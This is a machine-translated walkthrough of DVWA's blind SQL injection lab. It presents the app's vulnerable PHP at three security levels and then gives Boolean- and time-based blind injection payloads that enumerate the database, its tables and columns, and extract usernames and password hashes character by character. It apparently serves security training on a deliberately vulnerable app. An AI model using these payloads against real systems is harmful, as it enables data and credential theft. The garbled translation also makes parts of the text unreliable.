DVWA——SQL Injection Blind（SQL盲注）

Blind SQL Introduction:

 Blinds, injected with the general difference is that, in general injection attacks can see the results directly from the injection statement on the page, while blind attackers often can not get the results from the display page, even if the statement injection We have no way of knowing execution, difficulty and therefore blind injection than the average high. Blind divided into three categories: Based on Boolean blind SQL injection , time-based blind SQL injection , based on an error of blind SQL injection .

 Blind thinking steps:

1 determines whether there is the injection, the injection is a character or a numeric

2. guess the name of the current database

3. guess the solution database table names

4. Solution guess the field names in the table

5. guess data

Low level:

<?php 

if( isset( $_GET[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_GET[ 'id' ]; 

    // Check database 
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors 

    // Get results 
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors 
    if( $num > 0 ) { 
        // Feedback for end user 
        echo '<pre>User ID exists in the database.</pre>'; 
    } 
    else { 
        // User wasn't found, so the page wasn't! 
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 

        // Feedback for end user 
        echo '<pre>User ID is MISSING from the database.</pre>'; 
    } 

    mysql_close(); 
} 

?> 

You can see, Low-level code id parameter does not do any checking, filtering, there are obvious SQL injection vulnerability

 

User ID exists in the database. Present display,

User ID is MISSING from the database. Showed the absence of

Method One: based on Boolean blinds

 1 determines whether there is injected, injection type

Input 1, output exists

 

 

 Input 1 'and 1 = 1 #, output exists

 

 

 Input 1 'and 1 = 2 #, output MISSING

 

 

 So there is a blind character.

2. Guess the database name

 

First guess database name length: 1 'and length (database ()) = 1 #, showed the absence until 1' and length (database ()) = 4 #, showed the presence of. . Description library name length of 4

 

 

 Then dichotomy guess the name of the database.

 Input . 1 'and ascii (substr (databse (), 1,1))> # 88 , showed the presence of, a description of a character database name ascii value is greater than 88 ;

 Input . 1 'and ascii (substr (databse (), 1,1)) <# 110 , shows the presence of, a description database name is a character ascii value of less than 110;

 Until guess the exact number so far. We know by experiment, where the first value is 100 ASCII, ASCII table to find the corresponding letter

 Input 1 'and ascii (substr (database (), 2,1))> 88 # - look for the second letter, etc., etc.

Repeat the above steps to obtain a library named dvwa

3. guess the solution database table names

Table first guess the number of 1 'and (select count (table_name) from information_schema.tables where table_schema = database ())> 5 #, output MISSING absent

Then 1 'and (select count (table_name) from information_schema.tables where table_schema = database ())> 2 #, output MISSING absent

1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 #，输出exists 存在

So there are two tables, let's guess the length of the first table

输入：1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>10 #，输出MISSING

使用二分法 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>5 #，输出 exists

 

Until - 1 'and length (substr ( (select table_name from information_schema.tables where table_schema = database () limit 0,1), 1)) = 9 #, output exists, i.e., the first table name is 9 characters long.

Now I guess the first letter of the first table

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>88 #

Until - 1 'and ascii (substr ((select table_name from information_schema.tables where table_schema = database () limit 0,1), 1,1)) = 103 #, i.e. corresponding to the letters g

Then we could guess other nine letters, is u, e, s, t, b, o, o, k, that is, of guestbook .

 

 

And a second table guess

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>88 #

。。。

The second table, Users

 

4. Guess the column name

Take users directly to the table, for example.

To guess the number of fields in the table 1 'and (select count (column_name ) from information_schema.columns where table_schema = database () and table_name =' users') = 8 # ( intermediate step is omitted) number is 8

Each user table name guess, according to a conventional process, from the first field starts users table, its each constituent character guess, to obtain a complete first field name ... then the first 2/3 / .. ./8 field name. When a larger number of field names longer time, if still in the above manner by hand guess, more time will be spent. When the limited time situation, and in fact, some fields may be less need to obtain the position of the field also am not going to make too much attention, first of all get several fields containing key information, such as: user name, password ...

 

 

[Guess] may be saved in the database field names
username: username / user_name / uname / u_name / user / name / ...
Password: password / pass_word / pwd / pass / ...

So our command can be 1 'and (select count (*) from information_schema.columns where table_schema = database () and table_name =' users' and column_name = 'user') = 1 #, output exists

 1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='password')=1 #，输出exists

So we can know the users table has user and password. You can also try other

 

The field values ​​in the table guess

The same dichotomy use to do, to write directly to the last step:

Username field values: 1 'and length (substr ((select user from users limit 0,1), 1)) = 5 #, output exists

- a description of the character length of the value field in the user field = 5.

Field value of the password: 1 'and length (substr ((select password from users limit 0,1), 1)) = 32 #,

- a description of the character length of the password field, the field value = 32 (the number of passwords substantially so long encryption method used may be saved md5)

Then use the dichotomy guess user field value :( user name)

1 'and ascii (substr ((select user from users limit 0,1), 1,1)) = xxx # (first character)

1 'and ascii (substr ((select user from users limit 0,1), 2,1)) = xxx # (second character)                                            

。。。。。

Guess password field values ​​:( password)

1 'and ascii (substr ((select password from users limit 0,1), 1,1)) = xxx # (first character)

。。。。。

 

Method two: time-based blind

 

1 determines whether there is the injection, the injection is a character or a numeric

 

Input 1 'and sleep (5) #, see a noticeable delay;

Input 1 and sleep (5) #, no delay;

Indicating the presence of a character based on the time the blinds.

2. guess the name of the current database

(Guess method described above has, directly to the results): 1 'and if (length (database ()) = 4, sleep (5), 1) # significant delay, description database name length is 4 characters.

Dichotomy then guess database name: 1 'and if (ascii (substr (database (), 1,1)) = 100, sleep (5), 1) # significant delay, is described first character database d.

Repeat the above steps, the database can be called dvwa guess

3. guess the solution database table names

First, suppose the number of tables in a database Solution: 1 'and if ((select count (table_name) from information_schema.tables where table_schema = database ()) = 2, sleep (5), 1) #, there are two tables described

The first table then guess length: 1 'and if (length (substr ((select table_name from information_schema.tables where table_schema = database () limit 0,1), 1)) = 9, sleep (5), 1) #, a description of a table name length 9

Dichotomy can guess the name of the table.

4. Guess the column names of the table in

Or to guess the number of users listed in the table: 1 'and if ((select count (column_name) from information_schema.columns where table_name =' users') = 8, sleep (5), 1) #, significantly delayed, indicating 8 column

Then guess length of the first column name: 1 'and if (length (substr ((select column_name from information_schema.columns where table_name =' users' limit 0,1), 1)) = 7, sleep (5), 1 ) # significantly delayed, indicating that the first column named seven characters

Then the dichotomy guess. . .

5. guess data

The same dichotomy to guess, there is process above.

(Because too many commands, but also the success of the output was the same, no screenshot)

 

Medium level:

<?php 

if( isset( $_POST[ 'Submit' ]  ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 
    $id = mysql_real_escape_string( $id ); 

    // Check database 
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors 

    // Get results 
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors 
    if( $num > 0 ) { 
        // Feedback for end user 
        echo '<pre>User ID exists in the database.</pre>'; 
    } 
    else { 
        // Feedback for end user 
        echo '<pre>User ID is MISSING from the database.</pre>'; 
    } 

    //mysql_close(); 
} 

?> 

Can be seen, Medium level code using the function of the special symbols mysql_real_escape_string escape, while the front page provided drop-down selection form, hoping to control the user's input.

We can see that this situation is similar to the previous hand sql injection, injection may be modified capture id

 

Not repeat them here, you can refer to the previous article, as well as Low level above tutorial.

 

High level:

<?php 

if( isset( $_COOKIE[ 'id' ] ) ) { 
    // Get input 
    $id = $_COOKIE[ 'id' ]; 

    // Check database 
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; 
    $result = mysql_query( $getid ); // Removed 'or die' to suppress mysql errors 

    // Get results 
    $num = @mysql_numrows( $result ); // The '@' character suppresses errors 
    if( $num > 0 ) { 
        // Feedback for end user 
        echo '<pre>User ID exists in the database.</pre>'; 
    } 
    else { 
        // Might sleep a random amount 
        if( rand( 0, 5 ) == 3 ) { 
            sleep( rand( 2, 4 ) ); 
        } 

        // User wasn't found, so the page wasn't! 
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 

        // Feedback for end user 
        echo '<pre>User ID is MISSING from the database.</pre>'; 
    } 

    mysql_close(); 
} 

?> 

You can see, High-level code using the cookie to pass parameters id, when the SQL query result is empty, it performs the function sleep (seconds), the purpose is to disrupt the time-based blind.

While adding LIMIT 1 in the SQL query statement, hoping to control output only one result. But we can comment it out by #.

Like the previous SQL injection, but the server-side implementation sleep function, will make the time-based blind accuracy is affected, here we can only use based on Boolean blinds.

Low level there is a command, you can see for yourself. .